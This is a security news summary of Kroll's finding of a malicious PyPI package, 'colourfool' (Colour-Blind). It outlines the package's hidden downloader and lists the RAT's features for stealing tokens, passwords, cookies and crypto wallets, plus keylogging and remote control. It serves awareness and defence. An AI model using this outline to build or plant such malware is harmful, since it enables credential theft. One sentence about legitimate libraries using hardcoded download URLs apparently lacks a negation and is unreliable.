- Kroll has detected a fully featured information stealer and remote access tool in the Python Package Index.
- The malware was found as part of a recent project to obtain more awareness of initial attack vectors.
- Kroll recommends using deployment processes that sandbox build targets before they are pushed to production.
Kroll’s Cyber Threat Intelligence team has discovered multiple packages with different degrees of sophistication. The team has also developed a tool to monitor Python Package Index to find and obtain malicious packages that are added to it. The malicious packages that were uncovered were named Colour-Blind by Kroll, which is a fully featured information stealer and remote access tool written in Python.
Using a tool by Kroll
The malicious package was found as a part of a project that aims to increase awareness of initial attack vectors and uses a tool developed by Kroll’s threat intelligence team. Kroll’s tool detected the package named “colourfool” and a copy was archived for manual inspection shortly after it was uploaded to PyPI. The first inspection revealed that it contained only one Python file of note, a suspiciously large setup.py file that is last modified four days earlier.
The script downloads a file and hides it from the user while executing. It is an obvious sign that it is suspicious and likely malicious. It gets a URL from a Pastebin snippet and failing this returned a hardcoded discord content delivery network URL. Legitimate libraries use hardcoded URLs for downloading executable resources.
The second stage contains a file, named code.py, which is significantly larger with 300 kilobytes and 2,038 lines of code. It includes a larger imports section along with modules allowing malicious activity in the form of keylogging or stealing cookies. While some of the functions are blatantly malicious, for example, a function named disable_antivirus, some of them try to add its location to the Microsoft Defender Antivirus exclusion path in Windows. Kroll’s Cyber Threat Intelligence team said,
« From analysis of the Colour-Blind malware, it is evident that this RAT has a lot of interesting features. It shows us how the common functionality of malware can easily be written in modern languages such as Python. This malware also provides insights into how the democratization of cybercrime could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. As such, Kroll will continue to monitor open-source language repositories for further malware strains to enable further detection opportunities. »
The functionality of the RAT accessible from the control interface includes:
- Tokens: Dumps to the screen login tokens for several application that use chromium via electron.io or chromium directly as an application framework, a notable example being Discord.
- Passwords: Dumps passwords extracted from web browsers to screen
- Cookies: Dumps all browser cookies to screen
- Keys: Dumps to key loggers captured data to screen
- Applications: Provides a list of running applications and a button to terminate them
- Data Dump: Sends all captured data to the C2 URL
- Screen: Shows screenshot of the user desktop and allows for rudimentary interaction such as key presses
- IP: Looks up IP information and displays it to screen (using a different function to earlier)
- Open Browser: Opens a browser to a given webpage
- Run: Runs a command via operating system
- Text Input: Sends keystroke to the machine
- Phantom/Metamask: Steals cryptocurrency wallet information